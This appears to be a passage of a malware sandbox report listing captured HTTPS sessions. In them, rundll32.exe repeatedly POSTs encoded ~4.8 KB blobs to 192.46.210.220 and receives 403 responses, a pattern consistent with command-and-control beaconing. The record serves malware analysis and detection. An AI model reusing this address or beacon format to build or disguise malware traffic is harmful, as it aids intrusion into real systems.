                                                                                                        1192.168.2.549757192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:06 UTC4OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:06 UTC5OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:07 UTC9INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:07 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        10192.168.2.549793192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:24 UTC49OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:24 UTC49OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:24 UTC54INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:24 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        11192.168.2.549800192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:28 UTC54OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:28 UTC54OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:28 UTC64INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:28 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        12192.168.2.549801192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:28 UTC59OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:28 UTC59OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:28 UTC64INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:28 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        13192.168.2.549807192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:31 UTC64OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:31 UTC64OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:32 UTC69INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:32 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        14192.168.2.549809192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:32 UTC69OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:32 UTC69OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:33 UTC74INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:33 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        15192.168.2.549815192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:35 UTC74OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:35 UTC74OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:36 UTC79INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:36 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        16192.168.2.549817192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:36 UTC79OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:36 UTC79OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:37 UTC84INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:37 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        17192.168.2.549823192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:39 UTC84OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:39 UTC84OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:40 UTC89INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:40 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        18192.168.2.549825192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:40 UTC89OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:40 UTC89OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:41 UTC94INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:41 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        19192.168.2.549831192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:43 UTC94OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:43 UTC94OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:44 UTC99INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:44 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        2192.168.2.549761192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:08 UTC9OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:08 UTC10OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:08 UTC14INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:08 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        20192.168.2.549833192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:44 UTC99OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:44 UTC99OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:45 UTC104INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:45 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        21192.168.2.549839192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:47 UTC104OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
